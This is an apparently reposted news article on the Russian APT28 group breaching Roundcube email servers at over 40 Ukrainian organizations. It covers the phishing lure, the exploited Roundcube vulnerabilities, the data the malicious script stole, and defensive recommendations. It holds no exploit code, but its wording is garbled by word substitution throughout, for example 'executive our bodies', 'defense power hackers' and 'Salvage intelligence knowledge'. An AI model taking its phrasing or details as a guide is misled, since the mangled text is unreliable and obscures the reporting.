Hackers Compromised the Roundcube Email Servers of Ukrainian organizations

by Esmeralda McKenzie
Hackers Compromised the Roundcube Email Servers of Ukrainian organizations

Hackers Compromised the Roundcube Email Servers of Ukrainian organizations

Hackers compromised the Roundcube Email Servers of Ukrainian organizations

APT28 (aka BlueDelta, Admire Bear, Sednit, and Sofacy), a threat group linked to Russia’s GRU, hacked the Roundcube email servers of over 40 Ukrainian organizations, including executive our bodies.

The cyber-espionage group extra special files in regards to the Russia-Ukraine conflict to trick of us into opening outrageous emails. These emails exploited vulnerabilities in Roundcube Webmail to hack into unsecured servers.

With the again of a malicious script, Russian defense power hackers redirect the oldsters’ incoming emails to an email address managed by the attackers after gaining unauthorized get entry to to the email servers.

Furthermore, this script is also extra special to:-

  • Salvage intelligence knowledge
  • Grab victims’ Roundcube address e-book
  • Grab session cookies
  • Grab other Roundcube database knowledge

The investigation by Ukraine’s CERT-UA and Recorded Future’s Insikt Community printed that the advertising and marketing and marketing and marketing campaign’s purpose was as soon as to fetch and steal defense power intelligence for Russia’s invasion of Ukraine.

Since November 2021, it is believed that the APT28 defense power hackers enjoy been the usage of the comparable infrastructure for these cyberespionage attacks and other illicit actions.

Besides as, this GRU-linked group has also confronted allegations of exploiting the previously unknown zero-day vulnerabilities in Microsoft Outlook.

Investigations by Ukraine’s CERT-UA

An email titled “Records of Ukraine” was as soon as detected throughout the thorough investigation of the mailbox contents of the pc person.

Here Under, now we enjoy mentioned the total key valuable aspects referring to this email:-

  • Email received on 12.05.2023
  • Email received from ukraine_news@meta[.]ua
  • The email contained a bait article from an “NV” (nv.ua) e-newsletter.
  • The email contained an exploit for the vulnerability in Roundcube CVE-2020-35730 (XSS)
  • The email contained JavaScript code for working “q.js” and “e.js” files.

An exploit for the Roundcube vulnerability that’s tracked as “CVE-2021-44026” (SQLi) is latest at some level of the “q.js” file. Whereas this exploit is basically extra special to extract knowledge from the database of Roundcube.

Furthermore, the identification of the “c.js” code printed that it carries an exploit for the CVE-2020-12641 vulnerability. This exploit allows for the execution of instructions on the mail server.

Ideas

Here under now we enjoy mentioned the total solutions equipped by the cybersecurity analysts:-

  • Within email attachments, the organizations must always disable HTML and/or JavaScript.
  • Employ anti-spoofing and authentication mechanisms to filter incoming email visitors.
  • Support your security tools and methods up-to-date with the most modern patches and updates.
  • Be sure to no longer starting up any attachments received from an unknown sender.

Source credit : cybersecuritynews.com

Related Posts